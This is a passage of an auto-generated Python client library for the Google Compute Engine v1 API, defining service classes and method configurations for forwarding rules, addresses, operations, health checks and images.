        request_type_name=u'ComputeForwardingRulesDeleteRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Returns the specified ForwardingRule resource.

        Args:
          request: (ComputeForwardingRulesGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (ForwardingRule) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Get'), request,
            global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.forwardingRules.get',
        http_method=u'GET',
        ordered_params=[u'project', u'region', u'forwardingRule'],
        path_params=[u'forwardingRule', u'project', u'region'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/forwardingRules/{forwardingRule}',
        request_field='',
        request_type_name=u'ComputeForwardingRulesGetRequest',
        response_type_name=u'ForwardingRule',
        supports_download=False,
    )

    def Insert(self, request, global_params=None):
        """Creates a ForwardingRule resource in the specified project and region using the data included in the request.

        Args:
          request: (ComputeForwardingRulesInsertRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Insert'), request,
            global_params=global_params)

    Insert.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.forwardingRules.insert',
        http_method=u'POST',
        ordered_params=[u'project', u'region'],
        path_params=[u'project', u'region'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/forwardingRules',
        request_field=u'forwardingRule',
        request_type_name=u'ComputeForwardingRulesInsertRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieves a list of ForwardingRule resources available to the specified project and region.

        Args:
          request: (ComputeForwardingRulesListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (ForwardingRuleList) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('List'), request,
            global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.forwardingRules.list',
        http_method=u'GET',
        ordered_params=[u'project', u'region'],
        path_params=[u'project', u'region'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/regions/{region}/forwardingRules',
        request_field='',
        request_type_name=u'ComputeForwardingRulesListRequest',
        response_type_name=u'ForwardingRuleList',
        supports_download=False,
    )

    def SetTarget(self, request, global_params=None):
        """Changes target URL for forwarding rule. The new target should be of the same type as the old target.

        Args:
          request: (ComputeForwardingRulesSetTargetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('SetTarget'), request,
            global_params=global_params)

    SetTarget.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.forwardingRules.setTarget',
        http_method=u'POST',
        ordered_params=[u'project', u'region', u'forwardingRule'],
        path_params=[u'forwardingRule', u'project', u'region'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/forwardingRules/{forwardingRule}/setTarget',
        request_field=u'targetReference',
        request_type_name=u'ComputeForwardingRulesSetTargetRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
class GlobalAddressesService(base_api.BaseApiService):
    """Methods for the globalAddresses API resource."""

    _NAME = u'globalAddresses'

    def __init__(self, client):
        super(ComputeV1.GlobalAddressesService, self).__init__(client)
        # This resource exposes no media-upload methods.
        self._upload_configs = {}

    def Delete(self, request, global_params=None):
        """Deletes the specified address resource.

        Args:
          request: (ComputeGlobalAddressesDeleteRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Delete'), request,
            global_params=global_params)

    Delete.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.globalAddresses.delete',
        http_method=u'DELETE',
        ordered_params=[u'project', u'address'],
        path_params=[u'address', u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/addresses/{address}',
        request_field='',
        request_type_name=u'ComputeGlobalAddressesDeleteRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Returns the specified address resource. Get a list of available addresses by making a list() request.

        Args:
          request: (ComputeGlobalAddressesGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Address) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Get'), request,
            global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.globalAddresses.get',
        http_method=u'GET',
        ordered_params=[u'project', u'address'],
        path_params=[u'address', u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/addresses/{address}',
        request_field='',
        request_type_name=u'ComputeGlobalAddressesGetRequest',
        response_type_name=u'Address',
        supports_download=False,
    )

    def Insert(self, request, global_params=None):
        """Creates an address resource in the specified project using the data included in the request.

        Args:
          request: (ComputeGlobalAddressesInsertRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Insert'), request,
            global_params=global_params)

    Insert.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.globalAddresses.insert',
        http_method=u'POST',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/addresses',
        request_field=u'address',
        request_type_name=u'ComputeGlobalAddressesInsertRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieves a list of global addresses.

        Args:
          request: (ComputeGlobalAddressesListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (AddressList) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('List'), request,
            global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.globalAddresses.list',
        http_method=u'GET',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/global/addresses',
        request_field='',
        request_type_name=u'ComputeGlobalAddressesListRequest',
        response_type_name=u'AddressList',
        supports_download=False,
    )
class GlobalForwardingRulesService(base_api.BaseApiService):
    """Methods for the globalForwardingRules API resource."""

    _NAME = u'globalForwardingRules'

    def __init__(self, client):
        super(ComputeV1.GlobalForwardingRulesService, self).__init__(client)
        # This resource exposes no media-upload methods.
        self._upload_configs = {}

    def Delete(self, request, global_params=None):
        """Deletes the specified GlobalForwardingRule resource.

        Args:
          request: (ComputeGlobalForwardingRulesDeleteRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Delete'), request,
            global_params=global_params)

    Delete.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.globalForwardingRules.delete',
        http_method=u'DELETE',
        ordered_params=[u'project', u'forwardingRule'],
        path_params=[u'forwardingRule', u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/forwardingRules/{forwardingRule}',
        request_field='',
        request_type_name=u'ComputeGlobalForwardingRulesDeleteRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Returns the specified GlobalForwardingRule resource. Get a list of available forwarding rules by making a list() request.

        Args:
          request: (ComputeGlobalForwardingRulesGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (ForwardingRule) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Get'), request,
            global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.globalForwardingRules.get',
        http_method=u'GET',
        ordered_params=[u'project', u'forwardingRule'],
        path_params=[u'forwardingRule', u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/forwardingRules/{forwardingRule}',
        request_field='',
        request_type_name=u'ComputeGlobalForwardingRulesGetRequest',
        response_type_name=u'ForwardingRule',
        supports_download=False,
    )

    def Insert(self, request, global_params=None):
        """Creates a GlobalForwardingRule resource in the specified project using the data included in the request.

        Args:
          request: (ComputeGlobalForwardingRulesInsertRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Insert'), request,
            global_params=global_params)

    Insert.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.globalForwardingRules.insert',
        http_method=u'POST',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/forwardingRules',
        request_field=u'forwardingRule',
        request_type_name=u'ComputeGlobalForwardingRulesInsertRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieves a list of GlobalForwardingRule resources available to the specified project.

        Args:
          request: (ComputeGlobalForwardingRulesListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (ForwardingRuleList) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('List'), request,
            global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.globalForwardingRules.list',
        http_method=u'GET',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/global/forwardingRules',
        request_field='',
        request_type_name=u'ComputeGlobalForwardingRulesListRequest',
        response_type_name=u'ForwardingRuleList',
        supports_download=False,
    )

    def SetTarget(self, request, global_params=None):
        """Changes target URL for the GlobalForwardingRule resource. The new target should be of the same type as the old target.

        Args:
          request: (ComputeGlobalForwardingRulesSetTargetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('SetTarget'), request,
            global_params=global_params)

    SetTarget.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.globalForwardingRules.setTarget',
        http_method=u'POST',
        ordered_params=[u'project', u'forwardingRule'],
        path_params=[u'forwardingRule', u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/forwardingRules/{forwardingRule}/setTarget',
        request_field=u'targetReference',
        request_type_name=u'ComputeGlobalForwardingRulesSetTargetRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
class GlobalOperationsService(base_api.BaseApiService):
    """Methods for the globalOperations API resource."""

    _NAME = u'globalOperations'

    def __init__(self, client):
        super(ComputeV1.GlobalOperationsService, self).__init__(client)
        # This resource exposes no media-upload methods.
        self._upload_configs = {}

    def AggregatedList(self, request, global_params=None):
        """Retrieves an aggregated list of all operations.

        Args:
          request: (ComputeGlobalOperationsAggregatedListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (OperationAggregatedList) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('AggregatedList'), request,
            global_params=global_params)

    AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.globalOperations.aggregatedList',
        http_method=u'GET',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/aggregated/operations',
        request_field='',
        request_type_name=u'ComputeGlobalOperationsAggregatedListRequest',
        response_type_name=u'OperationAggregatedList',
        supports_download=False,
    )

    def Delete(self, request, global_params=None):
        """Deletes the specified Operations resource.

        Args:
          request: (ComputeGlobalOperationsDeleteRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (ComputeGlobalOperationsDeleteResponse) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Delete'), request,
            global_params=global_params)

    Delete.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.globalOperations.delete',
        http_method=u'DELETE',
        ordered_params=[u'project', u'operation'],
        path_params=[u'operation', u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/operations/{operation}',
        request_field='',
        request_type_name=u'ComputeGlobalOperationsDeleteRequest',
        response_type_name=u'ComputeGlobalOperationsDeleteResponse',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Retrieves the specified Operations resource. Get a list of operations by making a list() request.

        Args:
          request: (ComputeGlobalOperationsGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Get'), request,
            global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.globalOperations.get',
        http_method=u'GET',
        ordered_params=[u'project', u'operation'],
        path_params=[u'operation', u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/operations/{operation}',
        request_field='',
        request_type_name=u'ComputeGlobalOperationsGetRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieves a list of Operation resources contained within the specified project.

        Args:
          request: (ComputeGlobalOperationsListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (OperationList) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('List'), request,
            global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.globalOperations.list',
        http_method=u'GET',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/global/operations',
        request_field='',
        request_type_name=u'ComputeGlobalOperationsListRequest',
        response_type_name=u'OperationList',
        supports_download=False,
    )
class HealthChecksService(base_api.BaseApiService):
    """Service class for the healthChecks resource."""

    _NAME = u'healthChecks'

    def __init__(self, client):
        super(ComputeV1.HealthChecksService, self).__init__(client)
        self._upload_configs = {}

    def Delete(self, request, global_params=None):
        """Deletes the specified HealthCheck resource.

        Args:
          request: (ComputeHealthChecksDeleteRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Delete'), request,
            global_params=global_params)

    Delete.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.healthChecks.delete',
        http_method=u'DELETE',
        relative_path=u'projects/{project}/global/healthChecks/{healthCheck}',
        ordered_params=[u'project', u'healthCheck'],
        path_params=[u'healthCheck', u'project'],
        query_params=[],
        request_field='',
        request_type_name=u'ComputeHealthChecksDeleteRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Returns the specified HealthCheck resource.

        Get a list of available health checks by making a list() request.

        Args:
          request: (ComputeHealthChecksGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (HealthCheck) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Get'), request,
            global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.healthChecks.get',
        http_method=u'GET',
        relative_path=u'projects/{project}/global/healthChecks/{healthCheck}',
        ordered_params=[u'project', u'healthCheck'],
        path_params=[u'healthCheck', u'project'],
        query_params=[],
        request_field='',
        request_type_name=u'ComputeHealthChecksGetRequest',
        response_type_name=u'HealthCheck',
        supports_download=False,
    )

    def Insert(self, request, global_params=None):
        """Creates a HealthCheck resource in the specified project using the data included in the request.

        Args:
          request: (ComputeHealthChecksInsertRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Insert'), request,
            global_params=global_params)

    Insert.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.healthChecks.insert',
        http_method=u'POST',
        relative_path=u'projects/{project}/global/healthChecks',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[],
        request_field=u'healthCheck',
        request_type_name=u'ComputeHealthChecksInsertRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieves the list of HealthCheck resources available to the specified project.

        Args:
          request: (ComputeHealthChecksListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (HealthCheckList) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('List'), request,
            global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.healthChecks.list',
        http_method=u'GET',
        relative_path=u'projects/{project}/global/healthChecks',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        request_field='',
        request_type_name=u'ComputeHealthChecksListRequest',
        response_type_name=u'HealthCheckList',
        supports_download=False,
    )

    def Patch(self, request, global_params=None):
        """Updates a HealthCheck resource in the specified project using the data included in the request.

        This method supports PATCH semantics and uses the JSON merge patch
        format and processing rules.

        Args:
          request: (ComputeHealthChecksPatchRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Patch'), request,
            global_params=global_params)

    Patch.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.healthChecks.patch',
        http_method=u'PATCH',
        relative_path=u'projects/{project}/global/healthChecks/{healthCheck}',
        ordered_params=[u'project', u'healthCheck'],
        path_params=[u'healthCheck', u'project'],
        query_params=[],
        request_field=u'healthCheckResource',
        request_type_name=u'ComputeHealthChecksPatchRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Update(self, request, global_params=None):
        """Updates a HealthCheck resource in the specified project using the data included in the request.

        Args:
          request: (ComputeHealthChecksUpdateRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Update'), request,
            global_params=global_params)

    Update.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.healthChecks.update',
        http_method=u'PUT',
        relative_path=u'projects/{project}/global/healthChecks/{healthCheck}',
        ordered_params=[u'project', u'healthCheck'],
        path_params=[u'healthCheck', u'project'],
        query_params=[],
        request_field=u'healthCheckResource',
        request_type_name=u'ComputeHealthChecksUpdateRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
class HttpHealthChecksService(base_api.BaseApiService):
    """Service class for the httpHealthChecks resource."""

    _NAME = u'httpHealthChecks'

    def __init__(self, client):
        super(ComputeV1.HttpHealthChecksService, self).__init__(client)
        self._upload_configs = {}

    def Delete(self, request, global_params=None):
        """Deletes the specified HttpHealthCheck resource.

        Args:
          request: (ComputeHttpHealthChecksDeleteRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Delete'), request,
            global_params=global_params)

    Delete.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.httpHealthChecks.delete',
        http_method=u'DELETE',
        relative_path=u'projects/{project}/global/httpHealthChecks/{httpHealthCheck}',
        ordered_params=[u'project', u'httpHealthCheck'],
        path_params=[u'httpHealthCheck', u'project'],
        query_params=[],
        request_field='',
        request_type_name=u'ComputeHttpHealthChecksDeleteRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Returns the specified HttpHealthCheck resource.

        Get a list of available HTTP health checks by making a list() request.

        Args:
          request: (ComputeHttpHealthChecksGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (HttpHealthCheck) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Get'), request,
            global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.httpHealthChecks.get',
        http_method=u'GET',
        relative_path=u'projects/{project}/global/httpHealthChecks/{httpHealthCheck}',
        ordered_params=[u'project', u'httpHealthCheck'],
        path_params=[u'httpHealthCheck', u'project'],
        query_params=[],
        request_field='',
        request_type_name=u'ComputeHttpHealthChecksGetRequest',
        response_type_name=u'HttpHealthCheck',
        supports_download=False,
    )

    def Insert(self, request, global_params=None):
        """Creates a HttpHealthCheck resource in the specified project using the data included in the request.

        Args:
          request: (ComputeHttpHealthChecksInsertRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Insert'), request,
            global_params=global_params)

    Insert.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.httpHealthChecks.insert',
        http_method=u'POST',
        relative_path=u'projects/{project}/global/httpHealthChecks',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[],
        request_field=u'httpHealthCheck',
        request_type_name=u'ComputeHttpHealthChecksInsertRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieves the list of HttpHealthCheck resources available to the specified project.

        Args:
          request: (ComputeHttpHealthChecksListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (HttpHealthCheckList) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('List'), request,
            global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.httpHealthChecks.list',
        http_method=u'GET',
        relative_path=u'projects/{project}/global/httpHealthChecks',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        request_field='',
        request_type_name=u'ComputeHttpHealthChecksListRequest',
        response_type_name=u'HttpHealthCheckList',
        supports_download=False,
    )

    def Patch(self, request, global_params=None):
        """Updates a HttpHealthCheck resource in the specified project using the data included in the request.

        This method supports PATCH semantics and uses the JSON merge patch
        format and processing rules.

        Args:
          request: (ComputeHttpHealthChecksPatchRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Patch'), request,
            global_params=global_params)

    Patch.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.httpHealthChecks.patch',
        http_method=u'PATCH',
        relative_path=u'projects/{project}/global/httpHealthChecks/{httpHealthCheck}',
        ordered_params=[u'project', u'httpHealthCheck'],
        path_params=[u'httpHealthCheck', u'project'],
        query_params=[],
        request_field=u'httpHealthCheckResource',
        request_type_name=u'ComputeHttpHealthChecksPatchRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Update(self, request, global_params=None):
        """Updates a HttpHealthCheck resource in the specified project using the data included in the request.

        Args:
          request: (ComputeHttpHealthChecksUpdateRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Update'), request,
            global_params=global_params)

    Update.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.httpHealthChecks.update',
        http_method=u'PUT',
        relative_path=u'projects/{project}/global/httpHealthChecks/{httpHealthCheck}',
        ordered_params=[u'project', u'httpHealthCheck'],
        path_params=[u'httpHealthCheck', u'project'],
        query_params=[],
        request_field=u'httpHealthCheckResource',
        request_type_name=u'ComputeHttpHealthChecksUpdateRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
class HttpsHealthChecksService(base_api.BaseApiService):
    """Service class for the httpsHealthChecks resource."""

    _NAME = u'httpsHealthChecks'

    def __init__(self, client):
        super(ComputeV1.HttpsHealthChecksService, self).__init__(client)
        self._upload_configs = {}

    def Delete(self, request, global_params=None):
        """Deletes the specified HttpsHealthCheck resource.

        Args:
          request: (ComputeHttpsHealthChecksDeleteRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Delete'), request,
            global_params=global_params)

    Delete.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.httpsHealthChecks.delete',
        http_method=u'DELETE',
        relative_path=u'projects/{project}/global/httpsHealthChecks/{httpsHealthCheck}',
        ordered_params=[u'project', u'httpsHealthCheck'],
        path_params=[u'httpsHealthCheck', u'project'],
        query_params=[],
        request_field='',
        request_type_name=u'ComputeHttpsHealthChecksDeleteRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Returns the specified HttpsHealthCheck resource.

        Get a list of available HTTPS health checks by making a list() request.

        Args:
          request: (ComputeHttpsHealthChecksGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (HttpsHealthCheck) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Get'), request,
            global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.httpsHealthChecks.get',
        http_method=u'GET',
        relative_path=u'projects/{project}/global/httpsHealthChecks/{httpsHealthCheck}',
        ordered_params=[u'project', u'httpsHealthCheck'],
        path_params=[u'httpsHealthCheck', u'project'],
        query_params=[],
        request_field='',
        request_type_name=u'ComputeHttpsHealthChecksGetRequest',
        response_type_name=u'HttpsHealthCheck',
        supports_download=False,
    )

    def Insert(self, request, global_params=None):
        """Creates a HttpsHealthCheck resource in the specified project using the data included in the request.

        Args:
          request: (ComputeHttpsHealthChecksInsertRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Insert'), request,
            global_params=global_params)

    Insert.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.httpsHealthChecks.insert',
        http_method=u'POST',
        relative_path=u'projects/{project}/global/httpsHealthChecks',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[],
        request_field=u'httpsHealthCheck',
        request_type_name=u'ComputeHttpsHealthChecksInsertRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieves the list of HttpsHealthCheck resources available to the specified project.

        Args:
          request: (ComputeHttpsHealthChecksListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (HttpsHealthCheckList) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('List'), request,
            global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.httpsHealthChecks.list',
        http_method=u'GET',
        relative_path=u'projects/{project}/global/httpsHealthChecks',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        request_field='',
        request_type_name=u'ComputeHttpsHealthChecksListRequest',
        response_type_name=u'HttpsHealthCheckList',
        supports_download=False,
    )

    def Patch(self, request, global_params=None):
        """Updates a HttpsHealthCheck resource in the specified project using the data included in the request.

        This method supports PATCH semantics and uses the JSON merge patch
        format and processing rules.

        Args:
          request: (ComputeHttpsHealthChecksPatchRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Patch'), request,
            global_params=global_params)

    Patch.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.httpsHealthChecks.patch',
        http_method=u'PATCH',
        relative_path=u'projects/{project}/global/httpsHealthChecks/{httpsHealthCheck}',
        ordered_params=[u'project', u'httpsHealthCheck'],
        path_params=[u'httpsHealthCheck', u'project'],
        query_params=[],
        request_field=u'httpsHealthCheckResource',
        request_type_name=u'ComputeHttpsHealthChecksPatchRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Update(self, request, global_params=None):
        """Updates a HttpsHealthCheck resource in the specified project using the data included in the request.

        Args:
          request: (ComputeHttpsHealthChecksUpdateRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Update'), request,
            global_params=global_params)

    Update.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.httpsHealthChecks.update',
        http_method=u'PUT',
        relative_path=u'projects/{project}/global/httpsHealthChecks/{httpsHealthCheck}',
        ordered_params=[u'project', u'httpsHealthCheck'],
        path_params=[u'httpsHealthCheck', u'project'],
        query_params=[],
        request_field=u'httpsHealthCheckResource',
        request_type_name=u'ComputeHttpsHealthChecksUpdateRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
class ImagesService(base_api.BaseApiService):
    """Service class for the images resource."""

    _NAME = u'images'

    def __init__(self, client):
        super(ComputeV1.ImagesService, self).__init__(client)
        self._upload_configs = {}

    def Delete(self, request, global_params=None):
        """Deletes the specified image.

        Args:
          request: (ComputeImagesDeleteRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Delete'), request,
            global_params=global_params)

    Delete.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.images.delete',
        http_method=u'DELETE',
        relative_path=u'projects/{project}/global/images/{image}',
        ordered_params=[u'project', u'image'],
        path_params=[u'image', u'project'],
        query_params=[],
        request_field='',
        request_type_name=u'ComputeImagesDeleteRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Deprecate(self, request, global_params=None):
        """Sets the deprecation status of an image.

        If an empty request body is given, clears the deprecation status
        instead.

        Args:
          request: (ComputeImagesDeprecateRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Deprecate'), request,
            global_params=global_params)

    Deprecate.method_config = lambda: base_api.ApiMethodInfo(
        method_id=u'compute.images.deprecate',
        http_method=u'POST',
        relative_path=u'projects/{project}/global/images/{image}/deprecate',
        ordered_params=[u'project', u'image'],
        path_params=[u'image', u'project'],
        query_params=[],
        request_field=u'deprecationStatus',
        request_type_name=u'ComputeImagesDeprecateRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Returns the specified image.

        Get a list of available images by making a list() request.

        Args:
          request: (ComputeImagesGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Image) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Get'), request,
            global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
